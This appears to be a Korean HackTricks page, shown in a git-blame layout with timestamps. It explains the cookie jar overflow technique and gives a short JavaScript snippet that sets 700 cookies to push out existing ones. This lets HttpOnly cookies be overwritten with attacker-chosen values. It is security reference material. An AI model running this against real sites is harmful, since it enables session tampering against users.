2022-04-28 16:01:33 +00:00
|
|
|
<details>
|
|
|
|
|
2024-02-10 21:30:13 +00:00
|
|
|
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
2024-02-10 21:30:13 +00:00
|
|
|
HackTricks를 지원하는 다른 방법:
|
2022-04-28 16:01:33 +00:00
|
|
|
|
2024-02-10 21:30:13 +00:00
|
|
|
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
|
|
|
|
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
|
|
|
|
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
|
|
|
|
* **Hacking 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
|
|
|
2024-02-10 21:30:13 +00:00
|
|
|
브라우저는 페이지에 저장할 수 있는 쿠키의 **제한이 있습니다**. 그러므로 어떤 이유로 인해 쿠키를 **사라지게** 하려면 가장 오래된 쿠키가 삭제되도록 쿠키 저장소를 **오버플로우**할 수 있습니다.
|
2021-10-19 00:01:07 +00:00
|
|
|
```javascript
|
|
|
|
// Set many cookies
|
|
|
|
for (let i = 0; i < 700; i++) {
|
2024-02-10 21:30:13 +00:00
|
|
|
document.cookie = `cookie${i}=${i}; Secure`;
|
2021-10-19 00:01:07 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
// Remove all cookies
|
|
|
|
for (let i = 0; i < 700; i++) {
|
2024-02-10 21:30:13 +00:00
|
|
|
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
|
2021-10-19 00:01:07 +00:00
|
|
|
}
|
|
|
|
```
|
2024-02-10 21:30:13 +00:00
|
|
|
제 3자 쿠키는 다른 도메인을 가리키기 때문에 덮어쓰이지 않습니다.
|
2021-10-19 00:01:07 +00:00
|
|
|
|
|
|
|
{% hint style="danger" %}
|
2024-02-10 21:30:13 +00:00
|
|
|
이 공격은 **HttpOnly 쿠키를 덮어쓸 수 있으므로 삭제한 다음 원하는 값으로 재설정할 수 있습니다**.
|
2021-10-19 00:01:07 +00:00
|
|
|
|
2024-02-10 21:30:13 +00:00
|
|
|
[**이 랩을 포함한 이 게시물**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/)에서 확인하세요.
|
2021-10-19 00:01:07 +00:00
|
|
|
{% endhint %}
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
2024-02-10 21:30:13 +00:00
|
|
|
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
2024-02-10 21:30:13 +00:00
|
|
|
HackTricks를 지원하는 다른 방법:
|
2022-04-28 16:01:33 +00:00
|
|
|
|
2024-02-10 21:30:13 +00:00
|
|
|
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
|
|
|
|
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
|
|
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
|
|
|
|
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를** **팔로우**하세요.
|
|
|
|
* **HackTricks**와 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
</details>
|